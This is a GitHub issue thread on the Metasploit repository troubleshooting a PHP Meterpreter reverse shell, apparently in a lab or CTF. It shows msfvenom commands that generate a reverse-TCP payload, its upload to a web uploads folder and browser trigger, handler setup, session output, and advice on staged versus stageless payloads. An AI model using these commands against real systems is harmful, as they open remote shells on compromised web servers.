rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

PHP Reverse Shell is not working #8964

Closed ghost closed 6 years ago

ghost commented 7 years ago

shell5.TXT

## Steps to reproduce

  1. First, creating the backdoor with msfvenom outside of metasploit

    root@5433584:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell5.PHP
    No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    No Arch selected, selecting Arch: php from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 30067 bytes

  2. Starting the listener

    msf > use multi/handler
    msf exploit(handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 10.14.11.92
    lhost => 10.14.11.92
    msf exploit(handler) > set lport 4449
    lport => 4449
    msf exploit(handler) > show options

    Module options (exploit/multi/handler):

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------

    Payload options (php/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  10.14.11.92      yes       The listen address
       LPORT  4449             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target

    msf exploit(handler) > exploit
    [*] Exploit running as background job 0.

    [*] Started reverse TCP handler on 10.14.11.92:4449

netstat -an |grep 444 shows:

    root@5433584:~# netstat -an |grep 444
    tcp        0      0 10.14.11.92:4449        0.0.0.0:*               LISTEN


Therefore, everything is fine.

Calling the PHP script directly in Browser to trigger:
http://10.14.11.150/admin/uploads/shell5.PHP


## Expected behavior

Shell should come up

## Current behavior
Error message comes up:

    Parse error: syntax error, unexpected '[' in /var/www/admin/uploads/shell5.PHP on line 1

I've looked at the source of the shell and saw this:
    /*<?php /**/ if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset($GLOBALS['channel_process_map'])) { $GLOBALS['channel_process_map'] = array(); } if (!isset($GLOBALS['resource_type_map'])) { $GLOBALS['resource_type_map'] = array(); } if (!isset($GLOBALS['udp_host_map'])) { $GLOBALS['udp_host_map'] = array(); } if (!isset($GLOBALS[

Question:
This should be without the /* comment, right?
Even when removing it, the behavior is the same. The <?php seems not to be closed anywhere.

Source is attached as txt-file. 

## System stuff

### Metasploit version
Framework: 4.16.6-dev
Console  : 4.16.6-dev

### I installed Metasploit with:
- [x] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS
Linux 54784584 4.12.0-kali1-amd64 #1 SMP Debian 4.12.6-1kali1 (2017-08-18) x86_64 GNU/Linux

thanks for checking

AlistairXX commented 7 years ago

Nicely explained

jvoisin commented 7 years ago

The comment shouldn't matter, and there is no need to close the opening <?php; the issue is elsewhere :/

Rogdham commented 7 years ago

Hello @DontFuckItUp, I believe the issue is because you used the payload php/meterpreter_reverse_tcp with msfvenom (unstaged payload), but specified the staged version php/meterpreter/reverse_tcp in msfconsole.

Notice that one has a _ between meterpreter and reverse while the other has a /.

Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?
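Rogdham's naming rule (a `/` between stage and stager means staged, a `_` means stageless) can be turned into a pre-flight check that compares what msfvenom generated with what the handler is waiting for. The script below is an added example, not part of this issue or of the Metasploit code base; it assumes that rule plus a hard-coded list of stage names (meterpreter and shell), and parses the msfvenom command line and msfconsole transcript from the first post, copied here as constructed sample input.

```python
import re
# Stage names in staged Metasploit payload paths (assumption: only the common two).
KNOWN_STAGES = ("meterpreter", "shell")

def parse_payload(name):
    """Return (staged, canonical) using the thread's rule: "<stage>/<stager>" is
    staged, "<stage>_<stager>" is stageless; canonical always uses "/"."""
    parts = name.strip().split("/")
    if len(parts) >= 3 and parts[-2] in KNOWN_STAGES:
        return True, "/".join(parts)
    last = parts[-1]
    for stage in KNOWN_STAGES:
        if last.startswith(stage + "_"):
            return False, "/".join(parts[:-1] + [stage, last[len(stage) + 1:]])
    return False, "/".join(parts)  # a "single": no separate stage at all

def settings_from_venom(cmdline):
    """Extract payload, LHOST and LPORT from an msfvenom command line."""
    opts = {"payload": re.search(r"-p\s+(\S+)", cmdline).group(1)}
    opts.update((k.lower(), v) for k, v in re.findall(r"\b(LHOST|LPORT)=(\S+)", cmdline))
    return opts

def settings_from_console(transcript):
    """Extract the last 'set payload/lhost/lport' values from an msfconsole log."""
    return {k.lower(): v for k, v in re.findall(r">\s*set\s+(\S+)\s+(\S+)", transcript)}

def check(venom, console):
    """List mismatches between the generated payload and the waiting handler."""
    findings = []
    v_staged, v_name = parse_payload(venom["payload"])
    c_staged, c_name = parse_payload(console["payload"])
    if v_staged != c_staged:
        findings.append("staging mismatch: msfvenom built %s %s, handler expects %s %s" % (
            "staged" if v_staged else "stageless", venom["payload"],
            "staged" if c_staged else "stageless", console["payload"]))
    elif v_name != c_name:
        findings.append("payload mismatch: %s vs %s" % (venom["payload"], console["payload"]))
    for key in ("lhost", "lport"):
        if venom.get(key) != console.get(key):
            findings.append("%s mismatch: %s vs %s" % (key.upper(), venom.get(key), console.get(key)))
    return findings

# Constructed sample input, copied from the first attempt in this issue.
VENOM_CMD = "msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw"
CONSOLE_LOG = """msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.14.11.92
msf exploit(handler) > set lport 4449
"""
```

Running `check(settings_from_venom(VENOM_CMD), settings_from_console(CONSOLE_LOG))` on the first post's transcripts yields exactly one finding, the staging mismatch described above; with matching payload names it returns an empty list.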

ghost commented 7 years ago

Hello, I tested your recommendation with no luck. To be more detailed, I followed your directions: "Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?"

and as the result, the session dies. My full log:

root@klappse:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell6.PHP
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1112 bytes

root@klappse:~# msfconsole

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!

       =[ metasploit v4.16.9-dev                          ]
+ -- --=[ 1687 exploits - 966 auxiliary - 299 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 10.14.11.92
LHOST => 10.14.11.92
msf exploit(handler) > set LPORT 4449
LPORT => 4449
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.14.11.92      yes       The listen address
   LPORT  4449             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.14.11.92:4449
msf exploit(handler) > [*] Sending stage (37514 bytes) to 10.14.11.91
[*] Meterpreter session 1 opened (10.14.11.92:4449 -> 10.14.11.91:45139) at 2017-10-09 12:44:22 +0200
[*] 10.14.11.91 - Meterpreter session 1 closed.  Reason: Died

kawaxi commented 7 years ago

I might be having a similar issue if not the same one!

gaskinsus commented 6 years ago

I'm seeing similar in v4.16.13-dev. Tcpdump shows syn packets on attacker machine with no response. Is in ctf environment so cannot get files.

fsacer commented 6 years ago

@wvu-r7 seems there wasn't a stable connection/something blocking it, so it's probably not a valid bug.

Gilpw commented 6 years ago

wrong payload (php/meterpreter/reverse_tcp), set (php/meterpreter_reverse_tcp)

jopeywhiskerz commented 1 year ago

Remove the comment at the beginning and add a ?> at the end